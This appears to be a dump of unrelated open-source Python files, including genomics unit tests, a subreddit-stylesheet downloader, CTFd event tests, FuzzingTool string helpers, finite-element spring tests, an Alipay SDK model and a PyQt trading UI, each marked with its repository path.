[["2", "91128", "91358", "CTCF"], # len 200
["2", "91130", "91239", "CTCF"], # len 109
["2", "91156", "91310", "CTCF"]] # len 154
# multiple features, between 8533 and 9049
self.rows_example3 = \
[["chr3", "8533", "8817", "eGFP-FOS"], # len 284
["chr3", "8541", "8651", "GABP"], # len 110
["chr3", "8574", "8629", "Pol2"], # len 145
["chr3", "8619", "9049", "CTCF"], # len 430
["chr3", "8620", "8680", "TBP"], # len 60
["chr3", "8645", "8720", "TBP"]] # len 75
def get_feature_rows(self, chrom, start, end):
"""This function disregards (`start`, `end`) input
"""
if chrom is None:
return None
if chrom == "1":
return self.rows_example1
elif chrom == "2":
return self.rows_example2
elif chrom == "3":
return self.rows_example3
else:
return []
############################################
# Correctness tests for `_is_positive_row`
############################################
def test__is_positive_row_false(self):
query_start, query_end = (16150, 16351) # len 201
feat_start, feat_end = (16110, 16190) # len 80
threshold = 0.50
self.assertFalse(
_is_positive_row(
query_start, query_end, feat_start, feat_end, threshold))
def test__is_positive_row_true_eq_threshold(self):
query_start, query_end = (16110, 16309) # len 199
feat_start, feat_end = (16110, 16190) # len 80
threshold = 0.40
self.assertTrue(
_is_positive_row(
query_start, query_end, feat_start, feat_end, threshold))
def test__is_positive_row_true_gt_threshold(self):
query_start, query_end = (16110, 16311) # len 201
feat_start, feat_end = (16110, 16290) # len 170
threshold = 0.80
self.assertTrue(
_is_positive_row(
query_start, query_end, feat_start, feat_end, threshold))
############################################
# Correctness tests for `_any_positive_rows`
############################################
def test__any_positive_rows_none_rows(self):
rows = None
query_start, query_end = (10, 100)
threshold = {k: 0.50 for k in self.features}
self.assertFalse(
_any_positive_rows(rows, query_start, query_end, threshold))
def test__any_positive_rows_empty_rows(self):
rows = []
query_start, query_end = (10, 100)
threshold = {k: 0.50 for k in self.features}
self.assertFalse(
_any_positive_rows(rows, query_start, query_end, threshold))
def test__any_positive_rows_false(self):
rows = self.rows_example1
query_start, query_end = (16150, 16351)
threshold = {k: 0.50 for k in self.features}
self.assertFalse(
_any_positive_rows(rows, query_start, query_end, threshold))
def test__any_positive_rows_true(self):
rows = self.rows_example1
query_start, query_end = (16150, 16351)
threshold = {k: 0.40 for k in self.features}
self.assertTrue(
_any_positive_rows(rows, query_start, query_end, threshold))
############################################
# Correctness tests for `_get_feature_data`
############################################
def test__get_feature_data_none_rows(self):
query_chrom, query_start, query_end = (None, 10, 211)
threshold = np.array([0.50] * self.n_features).astype(np.float32)
expected_encoding = [0, 0, 0, 0, 0, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_empty_rows(self):
query_chrom, query_start, query_end = ("7", 10, 211)
threshold = np.array([0.50] * self.n_features).astype(np.float32)
expected_encoding = [0, 0, 0, 0, 0, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_single_feat_positive(self):
query_chrom, query_start, query_end = ("1", 16100, 16350)
threshold = np.array([0.50] * self.n_features).astype(np.float32)
expected_encoding = [1, 0, 0, 0, 0, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_no_feat_positive(self):
query_chrom, query_start, query_end = ("2", 91027, 91228)
threshold = np.array([0.51] * self.n_features).astype(np.float32)
expected_encoding = [0, 0, 0, 0, 0, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_multiple_feats_positive(self):
query_chrom, query_start, query_end = ("3", 8619, 8719)
threshold = np.array([0.50] * self.n_features).astype(np.float32)
expected_encoding = [1, 1, 0, 0, 0, 1]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_different_thresholds(self):
query_chrom, query_start, query_end = ("3", 8619, 8719)
threshold = np.array([0.50, 0.0, 0.0, 0.0, 0.0, 1.0]).astype(np.float32)
expected_encoding = [1, 1, 1, 0, 1, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
############################################
# GenomicFeatures integration tests
############################################
def test_GenomicFeatures_single_threshold(self):
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features, 0.50)
self.assertDictEqual(
query_features.feature_thresholds,
{k: 0.50 for k in self.features})
self.assertSequenceEqual(
query_features._feature_thresholds_vec.tolist(),
[0.50] * self.n_features)
def test_GenomicFeatures_diff_thresholds(self):
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features,
{"default": 0.50, "CTCF": 0.0, "Pol2": 0.15})
self.assertEqual(
query_features.feature_thresholds,
{"CTCF": 0.0, "eGFP-FOS": 0.50,
"GABP": 0.50, "Pbx3": 0.50,
"Pol2": 0.15, "TBP": 0.50})
np.testing.assert_almost_equal(
query_features._feature_thresholds_vec.tolist(),
[0.0, 0.50, 0.50, 0.50, 0.15, 0.50])
def test_GenomicFeatures_lambda_thresholds(self):
def _feature_thresholds(f):
if f == "Pbx3":
return 0.30
elif f == "CTCF":
return 0.40
else:
return 0.50
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features, _feature_thresholds)
self.assertEqual(
query_features.feature_thresholds,
{"CTCF": 0.40, "eGFP-FOS": 0.50,
"GABP": 0.50, "Pbx3": 0.30,
"Pol2": 0.50, "TBP": 0.50})
np.testing.assert_almost_equal(
query_features._feature_thresholds_vec.tolist(),
[0.40, 0.50, 0.50, 0.30, 0.50, 0.50])
def test_GenomicFeatures_no_thresholds__get_feature_data(self):
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features, feature_thresholds=None)
expected_feature_data = np.zeros(self.n_features)
expected_feature_data[self.feature_index_map['CTCF']] = 1.
# NOTE: "1 16110 16390 CTCF" is the first line in the test data.
actual_feature_data = query_features.get_feature_data('1', 16110, 16390)
np.testing.assert_array_almost_equal(
actual_feature_data,
expected_feature_data
)
def test_GenomicFeatures_0_5_threshold__get_feature_data(self):
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features, feature_thresholds=0.5)
# NOTE: "1 16110 16390 CTCF" is the first line in the test data.
# Overlap is less than a threshold:
np.testing.assert_array_almost_equal(
query_features.get_feature_data('1', 16000, 17000),
np.zeros(self.n_features)
)
# Overlap is greater than a threshold:
expected_feature_data = np.zeros(self.n_features)
expected_feature_data[self.feature_index_map['CTCF']] = 1.
np.testing.assert_array_almost_equal(
query_features.get_feature_data('1', 16000, 16500),
expected_feature_data
)
if __name__ == "__main__":
unittest.main()
|
timesearch_modules/get_styles.py | clayne/timesearch | 127 | 46911 | <filename>timesearch_modules/get_styles.py
import os
import requests
from . import common
from . import tsdb
session = requests.Session()
def get_styles(subreddit):
(database, subreddit) = tsdb.TSDB.for_subreddit(subreddit, fix_name=True)
print('Getting styles for /r/%s' % subreddit)
subreddit = common.r.subreddit(subreddit)
styles = subreddit.stylesheet()
database.styles_dir.makedirs(exist_ok=True)
stylesheet_filepath = database.styles_dir.with_child('stylesheet.css')
print('Downloading %s' % stylesheet_filepath.relative_path)
with stylesheet_filepath.open('w', encoding='utf-8') as stylesheet:
stylesheet.write(styles.stylesheet)
for image in styles.images:
image_basename = image['name'] + '.' + image['url'].split('.')[-1]
image_filepath = database.styles_dir.with_child(image_basename)
print('Downloading %s' % image_filepath.relative_path)
with image_filepath.open('wb') as image_file:
response = session.get(image['url'])
image_file.write(response.content)
def get_styles_argparse(args):
return get_styles(args.subreddit)
|
corehq/motech/dhis2/tests/test_tasks.py | akashkj/commcare-hq | 471 | 46940 | from django.test import TestCase
from corehq import toggles
from corehq.motech.dhis2.tasks import send_datasets_for_all_domains
class TestSendDatasetsForAllDomains(TestCase):
domain_name = 'does-not-exist'
def setUp(self):
toggles.DHIS2_INTEGRATION.set(
self.domain_name,
enabled=True,
namespace=toggles.NAMESPACE_DOMAIN
)
def tearDown(self):
toggles.DHIS2_INTEGRATION.set(
self.domain_name,
enabled=False,
namespace=toggles.NAMESPACE_DOMAIN
)
def test_check_domain_exists(self):
"""
send_datasets_for_all_domains() should not raise an AttributeError
if a domain does not exist
"""
send_datasets_for_all_domains()
|
tests/data/expected/main/multiple_files_self_ref_single/output.py | adaamz/datamodel-code-generator | 891 | 46965 | <reponame>adaamz/datamodel-code-generator
# generated by datamodel-codegen:
# filename: test.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from pydantic import BaseModel, Field
class Second(BaseModel):
__root__: str
class First(BaseModel):
__root__: Second
class Model(BaseModel):
test_id: str = Field(..., description='test ID')
test_ip: First
|
modoboa/lib/tests/test_web_utils.py | HarshCasper/modoboa | 1,602 | 46976 | <gh_stars>1000+
"""Tests for web_utils."""
from django.test import SimpleTestCase
from .. import web_utils
class TestCase(SimpleTestCase):
"""Test functions."""
def test_size2integer(self):
self.assertEqual(web_utils.size2integer("1024"), 1024)
# Convert to bytes
self.assertEqual(web_utils.size2integer("1K"), 1024)
self.assertEqual(web_utils.size2integer("1M"), 1048576)
self.assertEqual(web_utils.size2integer("1G"), 1073741824)
# Convert to megabytes
self.assertEqual(web_utils.size2integer("1K", output_unit="MB"), 0)
self.assertEqual(web_utils.size2integer("1M", output_unit="MB"), 1)
self.assertEqual(web_utils.size2integer("1G", output_unit="MB"), 1024)
# Unsupported unit
with self.assertRaises(ValueError):
web_utils.size2integer("1K", output_unit="GB")
|
src/fuzzingtool/utils/utils.py | NESCAU-UFLA/FuzzingTool | 131 | 47002 | # Copyright (c) 2020 - present <NAME> <https://github.com/VitorOriel>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from .consts import FUZZING_MARK
from typing import List, Tuple, Union
def getIndexesToParse(content: str, searchFor: str = FUZZING_MARK) -> List[int]:
"""Gets the indexes of the searched substring into a string content
@type content: str
@param content: The parameter content
@type searchFor: str
@param searchFor: The substring to be searched indexes on the given content
@returns List[int]: The positions indexes of the searched substring
"""
return [i for i, char in enumerate(content) if char == searchFor]
def splitStrToList(
string: str,
separator: str = ',',
ignores: str = '\\'
) -> List[str]:
"""Split the given string into a list, using a separator
@type string: str
@param string: The string to be splited
@type separator: str
@param separator: A separator to split the string
@type ignores: str
@param ignores: A string to ignores the separator
@returns List[str]: The splited string
"""
if string:
if f'{ignores}{separator}' in string:
final = []
buffer = ''
for substr in string.split(separator):
if substr[-1] == ignores:
buffer += substr[:-1]+separator
else:
final.extend([buffer+substr])
buffer = ''
return final
return string.split(separator)
return []
def stringfyList(oneList: list) -> str:
"""Stringfies a list
@type oneList: list
@param oneList: A list to be stringed
@returns str: The stringed list
"""
output = ''
for i in range(len(oneList)-1):
output += f"{oneList[i]},"
output += oneList[-1]
return output
def getHumanLength(length: int) -> Tuple[Union[int, float], str]:
"""Get the human readable length from the result
@type length: int
@param length: The length of the response body
@returns Tuple[int|float, str]: The tuple with new length and the readable order
"""
for order in ["B ", "KB", "MB", "GB"]:
if length < 1024:
return (length, order)
length /= 1024
return (length, "TB")
def checkRangeList(content: str) -> List[Union[int, str]]:
"""Checks if the given content has a range list,
and make a list of the range specified
@type content: str
@param content: The string content to check for range
@returns List[int|str]: The list with the compiled content
"""
def getNumberRange(left: str, right: str) -> List[int]:
"""Get the number range list
@type left: str
@param left: The left string of the division mark
@type right: str
@param right: The right string of the division mark
@returns List[int]: The list with the range
"""
isNumber = True
i = len(left)
while isNumber and i > 0:
try:
int(left[i-1])
except:
isNumber = False
else:
i -= 1
leftDigit, leftStr = int(left[i:]), left[:i]
isNumber = True
i = 0
while isNumber and i < (len(right)-1):
try:
int(right[i+1])
except Exception as e:
isNumber = False
else:
i += 1
rightDigit, rightStr = int(right[:(i+1)]), right[(i+1):]
compiledList = []
if leftDigit < rightDigit:
while leftDigit <= rightDigit:
compiledList.append(
f"{leftStr}{str(leftDigit)}{rightStr}"
)
leftDigit += 1
else:
while rightDigit <= leftDigit:
compiledList.append(
f"{leftStr}{str(leftDigit)}{rightStr}"
)
leftDigit -= 1
return compiledList
def getLetterRange(left: str, right: str) -> List[str]:
"""Get the alphabet range list [a-z] [A-Z] [z-a] [Z-A]
@type left: str
@param left: The left string of the division mark
@type right: str
@param right: The right string of the division mark
@returns List[str]: The list with the range
"""
leftDigit, leftStr = left[-1], left[:-1]
rightDigit, rightStr = right[0], right[1:]
compiledList = []
if ord(leftDigit) <= ord(rightDigit):
orderLeftDigit = ord(leftDigit)
orderRightDigit = ord(rightDigit)
while orderLeftDigit <= orderRightDigit:
compiledList.append(
f"{leftStr}{chr(orderLeftDigit)}{rightStr}"
)
orderLeftDigit += 1
else:
orderLeftDigit = ord(leftDigit)
orderRightDigit = ord(rightDigit)
while orderLeftDigit >= orderRightDigit:
compiledList.append(
f"{leftStr}{chr(orderLeftDigit)}{rightStr}"
)
orderLeftDigit -= 1
return compiledList
if '\-' in content:
content = content.replace('\-', '-')
elif '-' in content:
left, right = content.split('-', 1)
try:
# Checks if the left and right digits from the mark are integers
int(left[-1])
int(right[0])
return getNumberRange(left, right)
except:
return getLetterRange(left, right)
return [content] |
tests/utils/test_events.py | nox237/CTFd | 3,592 | 47009 | <filename>tests/utils/test_events.py<gh_stars>1000+
from collections import defaultdict
from queue import Queue
from unittest.mock import patch
from redis.exceptions import ConnectionError
from CTFd.config import TestingConfig
from CTFd.utils.events import EventManager, RedisEventManager, ServerSentEvent
from tests.helpers import create_ctfd, destroy_ctfd, login_as_user, register_user
def test_event_manager_installed():
"""Test that EventManager is installed on the Flask app"""
app = create_ctfd()
assert type(app.events_manager) == EventManager
destroy_ctfd(app)
def test_event_manager_subscription():
"""Test that EventManager subscribing works"""
with patch.object(Queue, "get") as fake_queue:
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
saved_event = {"type": "notification", "data": saved_data}
fake_queue.return_value = saved_event
event_manager = EventManager()
events = event_manager.subscribe()
message = next(events)
assert isinstance(message, ServerSentEvent)
assert message.to_dict() == {"data": "", "type": "ping"}
assert message.__str__().startswith("event:ping")
assert len(event_manager.clients) == 1
message = next(events)
assert isinstance(message, ServerSentEvent)
assert message.to_dict() == saved_event
assert message.__str__().startswith("event:notification\ndata:")
assert len(event_manager.clients) == 1
def test_event_manager_publish():
"""Test that EventManager publishing to clients works"""
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
event_manager = EventManager()
q = defaultdict(Queue)
event_manager.clients[id(q)] = q
event_manager.publish(data=saved_data, type="notification", channel="ctf")
event = event_manager.clients[id(q)]["ctf"].get()
event = ServerSentEvent(**event)
assert event.data == saved_data
def test_event_endpoint_is_event_stream():
"""Test that the /events endpoint is text/event-stream"""
app = create_ctfd()
with patch.object(Queue, "get") as fake_queue:
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
saved_event = {"type": "notification", "data": saved_data}
fake_queue.return_value = saved_event
with app.app_context():
register_user(app)
with login_as_user(app) as client:
r = client.get("/events")
assert "text/event-stream" in r.headers["Content-Type"]
destroy_ctfd(app)
def test_redis_event_manager_installed():
"""Test that RedisEventManager is installed on the Flask app"""
class RedisConfig(TestingConfig):
REDIS_URL = "redis://localhost:6379/1"
CACHE_REDIS_URL = "redis://localhost:6379/1"
CACHE_TYPE = "redis"
try:
app = create_ctfd(config=RedisConfig)
except ConnectionError:
print("Failed to connect to redis. Skipping test.")
else:
with app.app_context():
assert isinstance(app.events_manager, RedisEventManager)
destroy_ctfd(app)
def test_redis_event_manager_subscription():
"""Test that RedisEventManager subscribing works."""
class RedisConfig(TestingConfig):
REDIS_URL = "redis://localhost:6379/2"
CACHE_REDIS_URL = "redis://localhost:6379/2"
CACHE_TYPE = "redis"
try:
app = create_ctfd(config=RedisConfig)
except ConnectionError:
print("Failed to connect to redis. Skipping test.")
else:
with app.app_context():
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
saved_event = {"type": "notification", "data": saved_data}
with patch.object(Queue, "get") as fake_queue:
fake_queue.return_value = saved_event
event_manager = RedisEventManager()
events = event_manager.subscribe()
message = next(events)
assert isinstance(message, ServerSentEvent)
assert message.to_dict() == {"data": "", "type": "ping"}
assert message.__str__().startswith("event:ping")
message = next(events)
assert isinstance(message, ServerSentEvent)
assert message.to_dict() == saved_event
assert message.__str__().startswith("event:notification\ndata:")
destroy_ctfd(app)
def test_redis_event_manager_publish():
"""Test that RedisEventManager publishing to clients works."""
class RedisConfig(TestingConfig):
REDIS_URL = "redis://localhost:6379/3"
CACHE_REDIS_URL = "redis://localhost:6379/3"
CACHE_TYPE = "redis"
try:
app = create_ctfd(config=RedisConfig)
except ConnectionError:
print("Failed to connect to redis. Skipping test.")
else:
with app.app_context():
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
event_manager = RedisEventManager()
event_manager.publish(data=saved_data, type="notification", channel="ctf")
destroy_ctfd(app)
def test_redis_event_manager_listen():
"""Test that RedisEventManager listening pubsub works."""
# This test is nob currently working properly
# This test is sort of incomplete b/c we aren't also subscribing
# I wasnt able to get listening and subscribing to work at the same time
# But the code does work under gunicorn and serve.py
try:
# import importlib
# from gevent.monkey import patch_time, patch_socket
# from gevent import Timeout
# patch_time()
# patch_socket()
class RedisConfig(TestingConfig):
REDIS_URL = "redis://localhost:6379/4"
CACHE_REDIS_URL = "redis://localhost:6379/4"
CACHE_TYPE = "redis"
try:
app = create_ctfd(config=RedisConfig)
except ConnectionError:
print("Failed to connect to redis. Skipping test.")
else:
with app.app_context():
# saved_event = {
# "data": {
# "team_id": None,
# "user_id": None,
# "content": "asdf",
# "title": "asdf",
# "id": 1,
# "team": None,
# "user": None,
# "date": "2020-08-31T23:57:27.193081+00:00",
# "type": "toast",
# "sound": None,
# },
# "type": "notification",
# }
event_manager = RedisEventManager()
# def disable_retry(f, *args, **kwargs):
# return f()
# with patch("tenacity.retry", side_effect=disable_retry):
# with Timeout(10):
# event_manager.listen()
event_manager.listen()
# event_manager.publish(
# data=saved_event["data"], type="notification", channel="ctf"
# )
destroy_ctfd(app)
finally:
pass
# import socket
# import time
# importlib.reload(socket)
# importlib.reload(time)
|
alipay/aop/api/domain/AlipayOfflineProviderShopactionRecordModel.py | snowxmas/alipay-sdk-python-all | 213 | 47022 | <filename>alipay/aop/api/domain/AlipayOfflineProviderShopactionRecordModel.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.OuterShopDO import OuterShopDO
class AlipayOfflineProviderShopactionRecordModel(object):
def __init__(self):
self._action_detail = None
self._action_outer_id = None
self._action_type = None
self._date_time = None
self._entity = None
self._industry = None
self._outer_shop_do = None
self._source = None
self._user_id = None
@property
def action_detail(self):
return self._action_detail
@action_detail.setter
def action_detail(self, value):
self._action_detail = value
@property
def action_outer_id(self):
return self._action_outer_id
@action_outer_id.setter
def action_outer_id(self, value):
self._action_outer_id = value
@property
def action_type(self):
return self._action_type
@action_type.setter
def action_type(self, value):
self._action_type = value
@property
def date_time(self):
return self._date_time
@date_time.setter
def date_time(self, value):
self._date_time = value
@property
def entity(self):
return self._entity
@entity.setter
def entity(self, value):
self._entity = value
@property
def industry(self):
return self._industry
@industry.setter
def industry(self, value):
self._industry = value
@property
def outer_shop_do(self):
return self._outer_shop_do
@outer_shop_do.setter
def outer_shop_do(self, value):
if isinstance(value, OuterShopDO):
self._outer_shop_do = value
else:
self._outer_shop_do = OuterShopDO.from_alipay_dict(value)
@property
def source(self):
return self._source
@source.setter
def source(self, value):
self._source = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.action_detail:
if hasattr(self.action_detail, 'to_alipay_dict'):
params['action_detail'] = self.action_detail.to_alipay_dict()
else:
params['action_detail'] = self.action_detail
if self.action_outer_id:
if hasattr(self.action_outer_id, 'to_alipay_dict'):
params['action_outer_id'] = self.action_outer_id.to_alipay_dict()
else:
params['action_outer_id'] = self.action_outer_id
if self.action_type:
if hasattr(self.action_type, 'to_alipay_dict'):
params['action_type'] = self.action_type.to_alipay_dict()
else:
params['action_type'] = self.action_type
if self.date_time:
if hasattr(self.date_time, 'to_alipay_dict'):
params['date_time'] = self.date_time.to_alipay_dict()
else:
params['date_time'] = self.date_time
if self.entity:
if hasattr(self.entity, 'to_alipay_dict'):
params['entity'] = self.entity.to_alipay_dict()
else:
params['entity'] = self.entity
if self.industry:
if hasattr(self.industry, 'to_alipay_dict'):
params['industry'] = self.industry.to_alipay_dict()
else:
params['industry'] = self.industry
if self.outer_shop_do:
if hasattr(self.outer_shop_do, 'to_alipay_dict'):
params['outer_shop_do'] = self.outer_shop_do.to_alipay_dict()
else:
params['outer_shop_do'] = self.outer_shop_do
if self.source:
if hasattr(self.source, 'to_alipay_dict'):
params['source'] = self.source.to_alipay_dict()
else:
params['source'] = self.source
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOfflineProviderShopactionRecordModel()
if 'action_detail' in d:
o.action_detail = d['action_detail']
if 'action_outer_id' in d:
o.action_outer_id = d['action_outer_id']
if 'action_type' in d:
o.action_type = d['action_type']
if 'date_time' in d:
o.date_time = d['date_time']
if 'entity' in d:
o.entity = d['entity']
if 'industry' in d:
o.industry = d['industry']
if 'outer_shop_do' in d:
o.outer_shop_do = d['outer_shop_do']
if 'source' in d:
o.source = d['source']
if 'user_id' in d:
o.user_id = d['user_id']
return o
|
Testing/test_springs.py | geosharma/PyNite | 199 | 47033 | # -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 <NAME>, SE; tamalone1
"""
import unittest
from PyNite import FEModel3D
import sys
from io import StringIO
class Test_Spring_Elements(unittest.TestCase):
''' Tests of spring members.'''
def setUp(self):
# Suppress printed output temporarily
sys.stdout = StringIO()
def tearDown(self):
# Reset the print function to normal
sys.stdout = sys.__stdout__
def test_spring_elements(self):
# A First Course in the Finite Element Method, 4th Edition
# <NAME>
# Example 2.1
# Units for this model are pounds and inches
system = FEModel3D()
system.add_node('1', 0, 0, 0)
system.add_node('2', 30, 0, 0)
system.add_node('3', 10, 0, 0)
system.add_node('4', 20, 0, 0)
# Add spring members
system.add_spring('S1', '1', '3', 1000)
system.add_spring('S2', '3', '4', 2000)
system.add_spring('S3', '4', '2', 3000)
# Define supports
system.def_support('1', True, True, True, True, True, True)
system.def_support('2', True, True, True, True, True, True)
system.def_support('3', False, True, True, True, True, True)
system.def_support('4', False, True, True, True, True, True)
# Add node loads
system.add_node_load('4', 'FX', 5000)
system.analyze(True)
# Check results
# correct_values = [('3', 0.9090909090909092),
# ('4', 1.3636363636363638),
# ('1', -909.0909090909091),
# ('2', -4090.9090909090914)]
n3_DX = system.Nodes['3'].DX['Combo 1']
self.assertAlmostEqual(n3_DX/ 0.9090909090909092, 1.0, 2)
n4_DX = system.Nodes['4'].DX['Combo 1']
self.assertAlmostEqual(n4_DX/1.3636363636363638, 1.0, 2)
n1_rxn = system.Nodes['1'].RxnFX['Combo 1']
self.assertAlmostEqual(n1_rxn/-909.0909090909091, 1.0, 2)
n2_rxn = system.Nodes['2'].RxnFX['Combo 1']
self.assertAlmostEqual(n2_rxn/-4090.9090909090914, 1.0, 2)
|
ptf_nn/ptf_nn_test_eth.py | linarnan/ptf | 113 | 47042 | <gh_stars>100-1000
#!/usr/bin/env python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# <NAME> (<EMAIL>)
#
#
import argparse
import scapy.all as sc
parser = argparse.ArgumentParser(description='PTF Nanomsg tester 2')
parser.add_argument(
"--interface", type=str, dest="interface")
parser.add_argument(
"--receive", dest="receive", action='store_true', default=False)
args = parser.parse_args()
def receive(interface):
def printp(p):
print("Received:", p)
sc.sniff(iface=interface, prn=lambda x: printp(x))
def main():
if args.receive:
receive(args.interface)
else: # send one
p = "ab" * 20
sc.sendp(p, iface=args.interface, verbose=0)
if __name__ == '__main__':
main()
|
docarray/array/storage/elastic/seqlike.py | jina-ai/docarray | 591 | 47063 | <filename>docarray/array/storage/elastic/seqlike.py<gh_stars>100-1000
from typing import Union, Iterable, Dict
from ..base.seqlike import BaseSequenceLikeMixin
from .... import Document
class SequenceLikeMixin(BaseSequenceLikeMixin):
"""Implement sequence-like methods for DocumentArray with Elastic as storage"""
def __eq__(self, other):
"""Compare this object to the other, returns True if and only if other
as the same type as self and other has the same meta information
:param other: the other object to check for equality
:return: ``True`` if other is equal to self
"""
# two DAW are considered as the same if they have the same client meta data
return (
type(self) is type(other)
and self._client.get_meta() == other._client.get_meta()
and self._config == other._config
)
def __len__(self):
"""Return the length of :class:`DocumentArray` that uses Elastic as storage
:return: the length of this :class:`DocumentArrayElastic` object
"""
try:
return self._client.count(index=self._config.index_name)["count"]
except:
return 0
def __contains__(self, x: Union[str, 'Document']):
"""Check if ``x`` is contained in this :class:`DocumentArray` with Elastic storage
:param x: the id of the document to check or the document object itself
:return: True if ``x`` is contained in self
"""
if isinstance(x, str):
return self._doc_id_exists(x)
elif isinstance(x, Document):
return self._doc_id_exists(x.id)
else:
return False
def __del__(self):
"""Delete this :class:`DocumentArrayElastic` object"""
self._save_offset2ids()
# if not self._persist:
# self._offset2ids.clear()
def __repr__(self):
"""Return the string representation of :class:`DocumentArrayElastic` object
:return: string representation of this object
"""
return f'<{self.__class__.__name__} (length={len(self)}) at {id(self)}>'
def _upload_batch(self, docs: Iterable['Document']):
batch = []
for doc in docs:
batch.append(self._document_to_elastic(doc))
if len(batch) > self._config.batch_size:
self._send_requests(batch)
self._refresh(self._config.index_name)
batch = []
if len(batch) > 0:
self._send_requests(batch)
self._refresh(self._config.index_name)
def extend(self, docs: Iterable['Document']):
docs = list(docs)
self._upload_batch(docs)
self._offset2ids.extend([doc.id for doc in docs])
|
quantdom/ui.py | HiteshMah-Jan/Quantdom | 578 | 47064 | """Ui."""
import logging
import logging.config
import os.path
from datetime import datetime
from PyQt5 import QtCore, QtGui
from .lib import (
EquityChart,
OptimizatimizedResultsTable,
OptimizationTable,
Portfolio,
QuotesChart,
ResultsTable,
Settings,
Symbol,
TradesTable,
get_quotes,
get_symbols,
strategies_from_file,
)
__all__ = ('MainWidget',)
logger = logging.getLogger(__name__)
DEFAULT_TICKER = 'AAPL'
SYMBOL_COLUMNS = ['Symbol', 'Security Name']
class SymbolsLoaderThread(QtCore.QThread):
symbols_loaded = QtCore.pyqtSignal(object)
def run(self):
symbols = get_symbols()
self.symbols_loaded.emit(symbols[SYMBOL_COLUMNS].values)
class DataTabWidget(QtGui.QWidget):
data_updated = QtCore.pyqtSignal(object)
def __init__(self, parent=None):
super().__init__(parent)
self.select_source = QtGui.QTabWidget(self)
self.select_source.setGeometry(210, 50, 340, 200)
self.init_shares_tab_ui()
self.init_external_tab_ui()
self.symbols_loader = SymbolsLoaderThread()
self.symbols_loader.started.connect(self.on_symbols_loading)
self.symbols_loader.symbols_loaded.connect(
self.on_symbols_loaded, QtCore.Qt.QueuedConnection
)
self.symbols_loader.start()
